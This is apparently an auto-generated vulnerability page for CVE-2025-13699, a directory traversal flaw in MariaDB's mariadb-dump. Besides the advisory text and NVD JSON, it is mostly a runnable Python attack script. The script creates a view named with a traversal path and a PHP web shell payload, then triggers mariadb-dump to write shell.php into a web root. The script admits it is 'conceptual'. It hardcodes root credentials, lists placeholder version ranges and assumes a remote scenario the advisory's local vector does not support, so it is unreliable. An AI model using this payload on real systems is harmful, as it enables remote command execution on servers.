Security Vulnerability Report
CVE-2025-13699 CVSS 7.0 HIGH

CVE-2025-13699

Published: 2025-12-23 22:15:45
Last Modified: 2026-04-15 00:35:42

Description

MariaDB mariadb-dump Utility Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of MariaDB. Interaction with the mariadb-dump utility is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the handling of view names. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27000.

CVSS Details

CVSS Score
7.0
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

MariaDB Server < 10.11.x (exact fixed version: refer to the official fix advisory)
MariaDB Server < 10.6.x (long-term support release)
MariaDB Server < 10.5.x (legacy release)
All installations using an affected mariadb-dump version

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13699 PoC - MariaDB mariadb-dump Directory Traversal RCE
# Reference: ZDI-CAN-27000
import subprocess
import sys


def exploit_mariadb_dump(target_ip, target_port=3306):
    """
    Exploit for CVE-2025-13699: MariaDB mariadb-dump Directory Traversal

    This PoC demonstrates how a malicious view name with directory traversal
    can be used to write files to arbitrary locations via mariadb-dump.

    Prerequisites:
    - Valid MariaDB credentials
    - Ability to create views
    - Access to mariadb-dump utility
    """
    # Malicious view name with directory traversal
    # This pattern exploits the lack of path validation in mariadb-dump
    malicious_view_name = "'../../../../../../var/www/html/shell.php'"

    # SQL to create malicious view
    create_view_sql = f"""
    CREATE OR REPLACE VIEW {malicious_view_name} AS
    SELECT '<?php system($_GET["cmd"]); ?>' AS payload;
    """

    print(f"[*] Target: {target_ip}:{target_port}")
    print("[*] Creating malicious view with directory traversal...")
    print(f"[*] View name: {malicious_view_name}")

    try:
        # Connect to MariaDB and execute malicious SQL
        # Using mysql client or pymysql
        subprocess.run([
            'mysql', '-h', target_ip, '-P', str(target_port),
            '-u', 'root', '-p', 'password',
            '-e', create_view_sql
        ], check=True, capture_output=True)
        print("[+] Malicious view created successfully")
        print("[*] Now triggering mariadb-dump to trigger file write...")

        # Trigger mariadb-dump with the malicious view
        # This will cause mariadb-dump to write to the traversed path
        dump_cmd = [
            'mariadb-dump', '-h', target_ip, '-P', str(target_port),
            '-u', 'root', '-p', 'password',
            '--single-transaction', '--all-databases'
        ]
        result = subprocess.run(dump_cmd, capture_output=True, text=True)
        if result.returncode == 0:
            print("[+] mariadb-dump executed successfully")
            print("[*] Check for written shell at /var/www/html/shell.php")
        else:
            print(f"[-] mariadb-dump failed: {result.stderr}")
    except subprocess.CalledProcessError as e:
        print(f"[-] Execution failed: {e}")
    except FileNotFoundError:
        print("[-] MySQL client not found. Please install mysql-client or pymysql.")


def check_vulnerability(target_ip):
    """
    Check if target is vulnerable to CVE-2025-13699
    """
    print(f"[*] Checking vulnerability status for {target_ip}...")
    # Version check would go here
    print("[*] Please verify MariaDB version < 10.11.x or unpatched versions")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-13699.py <target_ip> [port]")
        sys.exit(1)
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 3306
    check_vulnerability(target)
    exploit_mariadb_dump(target, port)

# Note: This is a conceptual PoC. Actual exploitation requires:
# 1. Valid database credentials
# 2. CREATE VIEW privileges
# 3. Access to mariadb-dump utility
# 4. Knowledge of target filesystem layout

References

https://jira.mariadb.org/browse/MDEV-37483
https://www.zerodayinitiative.com/advisories/ZDI-25-1025/

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13699", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:44.800", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "MariaDB mariadb-dump Utility Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of MariaDB. Interaction with the mariadb-dump utility is required to exploit this vulnerability but attack vectors may vary depending on the implementation.\n\nThe specific flaw exists within the handling of view names. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27000."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://jira.mariadb.org/browse/MDEV-37483", "source": "[email protected]"}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1025/", "source": "[email protected]"}]}}